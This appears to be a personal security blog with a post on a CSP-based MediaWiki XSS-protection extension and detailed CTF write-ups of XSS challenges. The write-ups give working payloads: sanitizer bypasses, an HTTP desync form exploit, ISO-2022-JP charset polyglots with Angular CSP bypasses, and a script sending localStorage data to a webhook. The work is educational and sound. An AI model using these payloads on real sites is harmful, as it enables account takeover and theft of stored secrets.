Showing posts with label infosec. Show all posts
Showing posts with label infosec. Show all posts

Wednesday, July 30, 2025

Preventing XSS in MediaWiki - A new extension to protect your Wiki

 Its no secret that the vast majority of serious security vulnerabilities in MediaWiki are Cross-Site-Scripting (XSS).

XSS is where an attacker can put evil javascript where they aren't supposed to in order to take over other users. For example, the typical attack would look like the attacker putting some javascript in a wiki page. The javascript would contain some instructions for the web browser, like make a specific edit. Then anyone who views the page would make the edit. Essentially it lets evil people take over other users' accounts. This is obviously quite problematic in a wiki environment.

This is the year 2025. We shouldn't have to deal with this anymore. Back in Y2K the advice was that "Web Users Should Not Engage in Promiscuous Browsing". A quarter of a century later, we have a better solution: Content-Security-Policy.

Everyone's favourite security technology: CSP

Content Security Policy (CSP) is a major web browser security technology designed to tackle this problem. Its actually a grab-bag of a lot of things, which sometimes makes it difficult to talk about, as its not one solution but a bunch of potential solutions to a bunch of different problems. Thus when people bring it up in conversation they can often talk past each other if they are talking about different parts of CSP.
 
First and foremost though CSP is designed to tackle XSS.
 
The traditional wisdom with CSP is that its easy if you start with it, but difficult to apply it afterwards in an effective way. Effective being the operative word. Since CSP has so many options and knobs, it is very easy to apply a CSP policy that does nothing but looks like it's doing something.

This isn't the first time I've tried MediaWiki and CSP. Back when I used to work for the Wikimedia Foundation in 2020, I was tasked with trying to make something work with CSP. Unfortunately it never really got finished. After I left, nobody developed it further and it was never deployed. *sads*

Part of the reason is I think the effort tried to do much all at once. From Wikimedia's perspective there are two big issues that they might want to solve: XSS and "privacy". XSS is very traditional, but privacy is somewhat unique to Wikimedia. Wikimedia sites allows users and admins to customize javascript. This is about as terrible an idea as it sounds, but here we are. There are various soft-norms around what people can do. Generally its expected that you are not allowed to send any data (even implicitly such as someone's IP address by loading an off-site resource) without their permission. CSP has the potential to enforce this, but its a more complex project then just the XSS piece. In theory the previous attempt was going to try and address both, which in retrospect was probably too much scope all at once relative to the resources dedicated to the project. In any case, after i left my job the project died.

Can we go simpler?

Recently I've been kind of curious about the idea of CSP but simple. What is the absolute minimal viable product for CSP in MediaWiki?

For starters this is just going to focus on XSS. Outside of Wikimedia, the privacy piece is not cared about very much. I don't know, maybe Miraheze care (not sure), but I doubt anyone else does. Most MediaWiki installs there is a much closer connection between the "interface-admin" group and the people running the servers, thus there is less need to restrict what interface-admin group can do. In any case, I don't work for WMF anymore, I'm not interested in dealing with all the political wrangling that would be needed to make something happen in the Wikimedia world. However, Wikimedia is not the only user of MediaWiki and perhaps there is still something useful we could easily do here.

The main insight is that the body of article and i18n messages generally should not contain javascript at all, but that is where most XSS attacks will occur. So if we can use CSP to disable all forms of javascript except <script> tags, and then use a post processing filter to filter all script tags out of the body of the article, we should be golden. At the same time, this should involve almost no changes to MediaWiki.

This is definitely not the recommended way of using CSP. Its entirely possible I'm missing something here and there is a way to bypass it. That said, I think this will work.

What exactly are we doing

So I made an Extension - XSSProtector. Here is what it does:

  • Set CSP script-src-attr 'none'.
    • This disables html attributes like onclick or onfocus. Code following MediaWiki conventions should never use these, but they are very common in attacks where you can bypass attribute sanitization. It is also very common in javascript based attacks, since the .innerHTML JS API ignores <script> tags but processes the on attributes.
  • Look for <script tag in content added for output (i.e. in OutputPage) and replace it with &lt;script tag. MediaWiki code following coding conventions should always use ResourceLoader or at least OutputPage::addHeadItem to add scripts, so only evil stuff should match. If it is in an attribute, there should be no harm with replacing with entity
  • Ditto for <meta and <base tags. Kind of a side point, but you can use <meta http-equiv="refresh" ... to redirect the page. <base can be used to adjust where resources are loaded from, and sometimes to pass data via the target attribute. We also use base-uri CSP directive to restrict this.
  • Add an additional CSP tag after page load - script-src-elem *, this disables unsafe-inline after page load. MediaWiki uses dynamic inline script tags during initial load for "legacy" scripts. I don't think it needs that after page load (Though i'm honestly not sure). The primary reason to do this is to disable javascript: URIs, which would be a major method to otherwise bypass this system.
  • We also try to regex out links with javascript URIs, but the regex is sketchy and i don't have great confidence in it the same way i do with the regex for <script.
  • Restrict form-action targets to 'self' to reduce risk of scriptless XSS that tricks users with forms

The main thing this misses is <style> tags. Attackers could potentially add them to extract data from a page, either by unclosed markup loading a resource that contains the rest of the page in the url or via attacks that use attribute selectors in CSS (so-called "scriptless xss").  It also could allow the attacker to make the page display weird in an attempt to trick the user. This would be pretty hard to block, especially if TemplateStyles extension is enabled, and the risk is relatively quite low as there is not much you can do with it. In any case, I decided not to care

The way the extension hooks into the Message class is very hacky. If this turns out to be a good idea, probably the extension would need to become part of core or new hooks would have to be added to Message.

Does it work?

Seems to. Of course, the mere fact i can't hack the thing I myself came up with isn't exactly the greatest brag. Nonetheless I think it works and I haven't been able to think of any bypasses. It also seems to not break anything in my initial testing.

 Extension support is a little less clear. I think it will work for most extensions that do normal things. Some extensions probably do things that won't work. In most cases they could be fixed by following MediaWiki coding conventions. In some cases, they are intrinsically problematic, such as Extension:Widgets.

To be very clear, this hasn't been exhaustively tested, so YMMV.

How many vulns will it stop?

Lets take a look at recent vulnerabilities in MediaWiki core. Taking a look in the vulns in the MediaWiki 1.39 release series, between 1.39.0 and 1.39.13 there were 29 security vulnerabilities.

17 of these vulnerabilities were not XSS. Note that many of these are very low severity, to the point its debatable if they even are security vulnerabilities. If I was triaging the non-XSS vulnerabilities, I would say there are 6 informational (informational is code for: I don't think this is a security vulnerability but other people disagree), 9 low severity, 2 medium-low severity. None of them come close to the severity of an (unauthenticated) XSS, although some may be on par with an XSS vuln that requires admin rights to exploit.

While I haven't explicitly tested all of them, I believe the remaining 12 would be blocked by this extension. Additionally, if we are just counting by number, this is a bit of an under count, as in many cases multiple issues are being counted as a single phab ticket, if reported at the same time.

In conclusion, this extension would have stopped 41% of the security vulnerabilities found so far in the 1.39.x release series of MediaWiki, including all of the high severity ones. That's pretty good in my opinion.

Try it yourself

You can download the extension from here. I'd be very curious if you find that the extension breaks anything or otherwise causes unusual behaviour. I'd also love for people to test it to see if they can bypass any of its protections.

It should support MediaWiki 1.39 and above, but please use the REL1_XX for the version of MediaWiki you have (i.e. On 1.39 use REL1_39 branch) as the master branch is not compatible with older MediaWiki.

Sunday, December 1, 2024

Writeup for the flatt XSS challenge

This November, the company Flatt put out three XSS challenges - https://challenge-xss.quiz.flatt.training/ ( source code at https://github.com/flatt-jp/flatt-xss-challenges )

These were quite challenging and I had a good time solving them. The code for all of my solutions is at http://bawolff.net/flatt-xss-challenge.htm. Here is how I solved them.

Challenge 1 (hamayan)

This was in my opinion, the easiest challenge.

The setup is as follows - We can submit a message. On the server side we have:

  const sanitized = DOMPurify.sanitize(message);
  res.view("/index.ejs", { sanitized: sanitized });

with the following template:

    <p class="message"><%- sanitized %></b></p>
    <form method="get" action="">
        <textarea name="message"><%- sanitized %></textarea>
        <p>
            <input type="submit" value="View 👀" formaction="/" />
        </p>
    </form>

As you can see, the message is sanitized and then used in two places - in normal HTML but also inside a <textarea>.

The <textarea> tag is not a normal HTML tag. It has a "text" content model. This means that HTML inside it is not interpreted and the normal HTML rules don't apply

Consider the following HTML as our message: <div title="</textarea><img src=x onerror=alert(origin)>">

In a normal html context, this is fairly innocous. It is a div with a title attribute. The title attribute looks like html, but it is just a title attribute.

However, if we put it inside a <textarea>, it gets interpreted totally differently. There are no elements inside a textarea, so there are no attribtues. The </textarea> thus closes the textarea tag instead of being a harmless attribute:

<textarea><div title="</textarea><img src=x onerror=alert(origin)>">

Thus, once the textarea tag gets closed, the <img> tag is free to execute.

https://challenge-hamayan.quiz.flatt.training/?message=%3Cdiv%20title=%22%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(origin)%3E%22%3E

Challenge 2 (Ryotak)

This challenge was probably the hardest for me.

The client-side setup

We have a website. You can enter some HTML and save it. Once saved, you are given an id number in the url, the HTML is fetched from the server, it is sanitized and then set to the innerHTML of a div.

The client-side sanitization is as follows:

        const SANITIZER_CONFIG = {
            DANGEROUS_TAGS: [
                'script',
                'iframe',
                'style',
                'object',
                'embed',
                'meta',
                'link',
                'base',
                'frame',
                'frameset',
                'svg',
                'math',
                'template',
            ],

            ALLOW_ATTRIBUTES: false
        }

        function sanitizeHtml(html) {
            const doc = new DOMParser().parseFromString(html, "text/html");
            const nodeIterator = doc.createNodeIterator(doc, NodeFilter.SHOW_ELEMENT);

            while (nodeIterator.nextNode()) {
                const currentNode = nodeIterator.referenceNode;
                if (typeof currentNode.nodeName !== "string" || !(currentNode.attributes instanceof NamedNodeMap) || typeof currentNode.remove !== "function" || typeof currentNode.removeAttribute !== "function") {
                    console.warn("DOM Clobbering detected!");
                    return "";
                }
                if (SANITIZER_CONFIG.DANGEROUS_TAGS.includes(currentNode.nodeName.toLowerCase())) {
                    currentNode.remove();
                } else if (!SANITIZER_CONFIG.ALLOW_ATTRIBUTES && currentNode.attributes) {
                    for (const attribute of currentNode.attributes) {
                        currentNode.removeAttribute(attribute.name);
                    }
                }
            }

            return doc.body.innerHTML;
        }

If that wasn't bad enough, there is also server-side sanitization, which I'll get to in a bit.

Client side bypass

This looks pretty bad. It disallows all attributes. It disallows <script> which you more or less need to anything interesting if you don't have event attributes. It disallows <math> and <svg> which most mXSS attacks rely on.

However there is a mistake:

        for (const attribute of currentNode.attributes) {
              currentNode.removeAttribute(attribute.name);
        }

Which should be:

        for (const attribute of Array.from(currentNode.attributes)) {
              currentNode.removeAttribute(attribute.name);
        } 

The attributes property is a NamedNodeMap. This is a live class that is connected to the DOM. This means that if you remove the first attribute, it is instantly deleted from this list, with the second attribute becoming the first, and so on.

This is problematic if you modifythe attributes while iterating through them in a loop. If you remove an attribute in the first iteration, the second attribute then becomes the first. The next iteration then goes to the current second attribute (previously the third). As a result, what was originally the second attribute gets skipped.

In essence, the code only removes odd attributes. Thus <video/x/onloadstart=alert(origin)><source> will have only the x removed, and continue to trigger the XSS.

For reasons that will be explained later, it is important that our exploit does not have any whitespace in it. An alternative exploit might be <img/x/src/y/onerror=alert(origin)>

The server-side part

That's all well and good, but the really tricky part of this challenge is the server side part.

        elif path == "/api/drafts":
            draft_id = query.get('id', [''])[0]
            if draft_id in drafts:
                escaped = html.escape(drafts[draft_id])
                self.send_response(200)
                self.send_data(self.content_type_text, bytes(escaped, 'utf-8'))
            else:
                self.send_response(200)
                self.send_data(self.content_type_text, b'')
        else:
            self.send_response(404)
            self.send_data(self.content_type_text, bytes('Path %s not found' % self.path, 'utf-8'))

As you can see, the server side component HTML-escapes its input.

This looks pretty impossible. How can you have XSS without < or >?

My first thought was maybe something to do with charset shenanigans. However this turned out to be impossible since everything is explicitly labelled UTF-8 and the injected HTML is injected via innerHTML so takes the current document's charset.

I also noticed that we could put arbitrary text into the 404 error page. The error page is served as text/plain, so it would not normally be exploitable. However, the JS that loads the html snippet uses fetch() without checking the returned content type. I thought perhaps there would be some way to make it fetch the wrong page and use the 404 result as the html snippet.

My first thought was maybe there is a different in path handling between python urllib and WHATWG URL spec. There is in fact lots of differences, but none that seemed exploitable. There was also no way to inject a <base> tag or anything like that. Last of all, the fetch url starts with a /, so its always going to be relative just to the host and not the current path.

I was stuck here for quite a long time.

Eventually I looked at the rest of the script. There are some odd things about it. First of all, it is using python's BaseHTTPRequestHandler as the HTTP server. The docs for that say in giant letters: "Warning: http.server is not recommended for production. It only implements basic security checks.". Sounds promising.

I also couldn't help but notice that this challenge was unique compared to the others - it was the only one hosted on an IP address with just plain HTTP/1.1 and no TLS. The other two were under the .quiz.flatt.training domain, HTTP/2 and presumably behind some sort of load balancer.

All signs pointed to something being up with the HTTP implementation.

Poking around the BaseHTTPRequestHandler, I found the following in a code comment: "IT IS IMPORTANT TO ADHERE TO THE PROTOCOL FOR WRITING!". All caps, must be important.

Lets take another look at the challenge script. Here is the POST handler:

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length'))
        if content_length > 100:
            self.send_response(413)
            self.send_data(self.content_type_text, b'Post is too large')
            return
        body = self.rfile.read(content_length)
        draft_id = str(uuid4())
        drafts[draft_id] = body.decode('utf-8')
        self.send_response(200)
        self.send_data(self.content_type_text, bytes(draft_id, 'utf-8'))

    def send_data(self, content_type, body):
        self.send_header('Content-Type', content_type)
        self.send_header('Connection', 'keep-alive')
        self.send_header('Content-Length', len(body))
        self.end_headers()
        self.wfile.write(body)


Admittedly, it took me several days to see this, but there is an HTTP protocol violation here.

The BaseHTTPRequestHandler class supports HTTP Keep-alive. This means that connections can be reused after the request is finished. This improves performance by not having to repeat a bunch of handshake steps for every request. The way this works is if the web server is willing to keep listening for more requests on a connection, it will set the Connection: Keep-Alive header. The challenge script always does this.

The problem happens during the case where a POST request has too large a body. The challenge script will return a 413 error if the POST request is too large. This is all fine and good. 413 is the correct error for such a situation. However it immediately returns after this, not reading the POST body at all, leaving it still in the connection buffer. Since the Connection: Keep-alive header is set, the python HTTP server class thinks the connection can be reused, and waits for more data. Since there is still data left in the connection buffer, it gets that data immediately, incorrectly assuming it is the start of a new request. (This type of issue is often called "client-side desync")

What the challenge script should do here is read Connection-Length number of bytes and discard them, removing them from the connection buffer, before handing the connection off to the base class to wait for the next request. Alternatively, it could set Connection: Close header, to signal that the connection can no longer be reused (This wouldn't be enough in and of itself, but the python base class looks for this). By responding without looking at the POST body, the challenge script desynchronizes the HTTP connection. The server thinks we are waiting on the next request, but the web browser is still in the middle of sending the current request.

To summarize, this means that if we send a large POST request, the web server will treat it as two separate requests instead of a single request.

We can use this to poision the connection. We send something that will be treated as two requests. When the browser sends its next request, the web server responds with part two of our first request, thus causing the web browser to think the answer to its second request is the answer to part two of of the first request.

The steps of our attack would be as follows:

  • Open a window to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63 (The specific draft_id doesn't matter as long as its consistent). This will ensure that the page is in cache, as we don't want it to be fetched in the middle of our attack. Note that this page is sent with a Cache-Control: max-age=3600 header, while most other requests do not have this header.
  • Make a long POST request that has a POST body that looks something like GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1\r\nhost:f\r\n;x-junk1: PADDING..  (This is why our payload cannot have whitespace, it would break the HTTP request which is whitespace delimited)
  •  Navigate to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63. Because we preloaded this and it is cachable, it should already be in cache. The web browser will load it from disk not the network. The javascript on this page will fetch the document with that doc_id in the url via fetch(). This response does not have a caching header, so the web browser makes a new request on the network. Since half of the previous POST is still in the connection buffer, the webserver responds to that request instead of the one the browser just made. The result is a 404 page containing our payload. The web browser sees that response, and incorrectly assumes it is for the request it just made via fetch(). It is sent with a text/plain content type and 404 status code but the javascript does not care.

The only tricky part left is how to send a POST with such fine-grained control over the body.

HTML forms have a little known feature where they can be set to send in text/plain mode. This works perfect for us. Thus we have a form like:

<form method="POST" target="ryotak" enctype="text/plain" action="http://34.171.202.118/" id="ryotakform">
<input type="hidden"
name="GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1&#xd;&#xa;host:f&#xd;&#xa;x-junk1: aaaaaaaaaaaaaaaaaaaaaa..." value="aa">
</form>

 The rest of the exploit looks like:

    window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
    setTimeout( function () {
        document.getElementById( 'ryotakform' ).submit();
        setTimeout( function () {
            window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
        }, 500 );
    }, 5000 );

 The timeouts are to ensure that the web browser had enough time to load the page before going to the next step.

You can try it out at http://bawolff.net/flatt-xss-challenge.htm

Challenge 3 (kinugawa)

Note: My solution works on Chrome but not Firefox.

The Setup 

  <meta charset="utf-8">
  <meta http-equiv="Content-Security-Policy"
    content="default-src 'none';script-src 'sha256-EojffqsgrDqc3mLbzy899xGTZN4StqzlstcSYu24doI=' cdnjs.cloudflare.com; style-src 'unsafe-inline'; frame-src blob:">

<iframe name="iframe" style="width: 80%;height:200px"></iframe>

[...]

      const sanitizedHtml = DOMPurify.sanitize(html, { ALLOWED_ATTR: [], ALLOW_ARIA_ATTR: false, ALLOW_DATA_ATTR: false });
      const blob = new Blob([sanitizedHtml], { "type": "text/html" });
      const blobURL = URL.createObjectURL(blob);
      input.value = sanitizedHtml;
      window.open(blobURL, "iframe");
 

We are given a page which takes some HTML, puts it through DOMPurify, turns it into a blob url then navigates an iframe to that blob.

Additionally there is a CSP policy limiting which scripts we can run.

The solution

The CSP policy is the easiest part. cdnjs.cloudflare.com is on the allow list which contains many js packages which are unsafe to use with CSP. We can use libraries like angular to bypass this restriction.

For the rest - we're obviously not going to find a 0-day in DOMPurify. If I did, I certainly would have lead the blog post with that.

However, since blob urls are separate documents, that means that they are parsed as a fresh HTML document. This includes charset detection (Since the mime type of the Blob is set to just text/html not text/html; charset=UTF-8). DOMPurify on the other hand is going to assume that the input byte stream does not need any character set related conversions.

So in principle, what we need to do here is create a polygot document. A document that is safe without any charset conversions applied, but becomes dangerous when interpreted under a non-standard character set. Additionally we then need to get the blob url interpreted as that character set.

There are a small number of character sets interpreted by web browsers. There used to be quite a lot of dangerous ones to chose from such as UTF-7 or hz. However most of these got removed and the only remaining charset that is easy to make dangerous is ISO-2022-JP.

The reason that ISO-2022-JP is so useful in exploits is that it is modal. It is actually 4 character sets in one, with a special code to change between them. If you write "^[$B" it switches to Japanese mode. "^[(B" on the other hand switches to ASCII mode. (^[ refers to ASCII character 0x1B, the escape character. You might also see it written as \x1B, %1B, ESC or \e). If we are already in the mode that the escape sequence switches to, then the character sequence does nothing and it is removed from the byte stream.

This means that <^[(B/style> will close a style tag when the document is in ISO-2022-JP mode, but is considered non-sense in UTF-8 mode.

Thus we might have a payload that looks like the following: (Remembering that ^[ stands for ascii ESC):

<style> <^[(B/style>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><^[(B/script>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'>
  <^[(B/script>
  <^[(Bdiv ng-app ng-csp>
    {{$on.curry.call().alert($on.curry.call().origin)}}
  <^[(B/div>
</style>

DOMPurify won't see <^[(B/style> as a closing style tag and thinks the whole thing is the body of the style tag. To prevent mXSS, DOMPurify won't allow things that look like html tags (a "<" followed by a letter) inside <style> tags, so those are also broken up with ^[(B. A browser interpreting this as ISO-2022-JP would simply not see the "^[(B" sequences and treat it as normal HTML.

Now all we need to do is to convince the web browser that this page should be considered ISO-2022-JP.

The easiest way of doing that would be with a <meta charset="ISO-2022-JP"> tag. Unfortunately DOMPurify does not allow meta tags through. Even if it did, this challenge configures DOMPurify to ban all attributes. (We can't use the ^[(B trick here, because it only works after the document is already in ISO-2022-JP mode).

Normally we could use detection heuristics. In most browsers, if a document does not have a charset in its content type nor a meta tag, the web browser just makes a guess based on its textual content of the beginning of the document. If the browser sees a bunch of ^[ characters used in a way that would be valid in ISO-2022-JP and no characters that would be invalid in that encoding (such as multibyte UTF-8 characters), it knows that this document is likely ISO-2022-JP, so guesses that as the charset of the document.

However this detection method is used as a method of last resort. In the case of an iframe document (which does not have a better method such as charset in the mime type or meta tag), the browser will use the parent windows charset, instead of guessing based on document contents.

Since this parent document uses UTF-8, this stops us.

However, what if we didn't use an iframe?

The challenge navigates the iframe by using its name. What if there was another window with the same name? Could we get that window to be navigated instead of the iframe?

If we use window.open() to open the challenge in a window named "iframe", then the challenge would navigate itself instead of the iframe. The blob is now a top-level navigation, so cannot take its charset from the parent window. Instead the browser has no choice but to look at the document contents as a heuristic, which we can control.

The end result is something along the lines of:

window.open( 'https://challenge-kinugawa.quiz.flatt.training/?html=' +
   encodeURIComponent( "<div>Some random Japanese text to trigger the heuristic: \x1b$B%D%t%#%C%+%&$NM5J!$J2HDm$K@8$^$l!\"%i%$%W%D%#%RBg3X$NK!2J$K?J$`$b!\"%T%\"%K%9%H$r$a$6$7$F%U%j!<%I%j%R!&%t%#!<%/$K;U;v$9$k!#$7$+$7!\";X$N8N>c$K$h$j%T%\"%K%9%H$rCGG0!\":n6J2H$H$J$k!#%t%#!<%/$NL<$G%T%\"%K%9%H$N%/%i%i$H$NNx0&$H7k:'$O%7%e!<%^%s$NAO:n3hF0$KB?Bg$J1F6A$r5Z$\$7$?!#\x1b(Bend <style><\x1b(B/style><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><\x1b(B/script><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'><\x1b(B/script><\x1b(Bdiv ng-app ng-csp>{{$on.curry.call().alert($on.curry.call().origin)}}<\x1b(B/div></style>begin\x1b$B%sE*8e\x1b(Bend</div>" ),
"iframe" );

Try it at http://bawolff.net/flatt-xss-challenge.htm

Conclusion

These were some great challenges. The last two especially took me a long time to solve.

Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

 Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge. It was the least solved web problem with only 4 solves. However I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near arbitrary HTML. The only restriction is that the following JS functions must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably they forgot to include onfocusin in the check, but you don't actually need it for the challenge
     

 This is all evaluated at save time by converting the html to a data: url, passing it to pupeteer chromium with javascript and external requests disabled. If it passes this validation, the html document goes on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal chrome instance with javascript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its LocalStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other javascript checks can easily be bypassed by either using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template> which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts in the page (as script-src inherits from default-src)

Normally CSP is specified in an HTTP header. Putting it inside the html document does come with some caveats:

  • It must be in the <head>. If its in the <body> it is ignored.
  • It does not apply to <script> tags (or anything else) in the document present prior to the <meta> tag

So my first initial thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

 Turns out, the answer is no. Per the HTML5 spec. If you add some content before the head, it acts like you implicitly closed the <head> tag and started the body tag. No matter how you structure your document, the web browser fixes it up to be reasonable. You cannot put anything other then a comment (and DTDs/PIs) before the <head>.

I also thought about DOM cloberring, but it seemed pretty impossible given that document.querySelector() and === was used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if i redirect the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in puppeteer so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something) so they are out. I can't use blob: urls as I have no javascript to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect too, as I need some page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since initially no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

Its a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, where the validator supports UTF-7 which has a non-ascii compatible encoding of <, but web browsers do not support it and interpret the document with an unknown charset as UTF-8.

However this is a bit different, since the web browser and ultimate viewer are the same program - both a web browser, both supporting the exact same charsets.

We need to find two character encodings that interpret the same document different ways - one with the CSP policy and one without, and have both character encodings be supported by modern web browsers.

What character sets can we even possibly specify? First off we can discard any encodings that always encode <, > and " the way ascii would which include all single-byte legacy encodings. Browsers have intentionally removed support for such encodings due to the problems caused by encodings like UTF-7 and HZ. Per the encoding standard, the only ones left are the following legacy multi-byte encodings: big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUR-KR, UTF-16BE, UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but 3 encodings that can be switched between each other with a special code. When in ascii mode, the encoding looks like normal ascii. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polygot document, as we can switch on and off the modes to change the meaning of a wide swath of text.

An Example

Note: throughout this post i will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence changes the charset mode to katakana, ^[(B changes it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polygot document that will give an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, chrome will start parsing immediately and guess the charset before the entire document.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, add a charset declaration at the end for the other charset which makes the document look good. Browsers loading it all at once will see it as benign, browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
    	<!-- é - Add a windows-1252 character to make sure early heurstics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag, processes the whole document in that charset. That means that the <script> tag is interpreted as an html comment in japanese, so is ignored
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (We can use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using atob() function), and makes a guess that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at this point as part of the document is already parsed (note: It appears that chrome deviates from the HTML5 spec here. The HTML5 spec says if a late <meta> tag is encountered, the document should be thrown out and reparsed provided that is possible without re-requesting from the network. Chrome seems to just switch charset at the point of getting the meta tag and continue on parsing). The end result is the first part of the document is interpreted as windows-1252, allowing the <script> tag to be executed.

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out chrome will wait a certain amount of time before preceding with parsing a partial response. The HTML5 spec suggests this should be at least 1024 bytes or 500ms (Whichever is longer), but it is unclear what chrome actually does. Testing this on localhost of course makes the network much more efficient. The MTU of the loopback interface is 64kb, so each packet is much bigger. Everything also happens much faster, so the timeout is much less likely to be reached.

Thus i did another test, where i used a php script, but put <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently I probably could have just tested on the remote version of the challenge.

After several hours of trying to debug, I had thus realized I had solved the problem several hours ago :(. In any case the previous snippet worked when run on the remote.

Conclusion

 This was a really fun challenge. It had me reading the HTML5 spec with a fine tooth comb, as well as making many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

 And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored in <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore it, but according to other contestants chrome does neither and instead switches midstream.

Thanks to project Sekai for hosting a great CTF.

Saturday, March 30, 2024

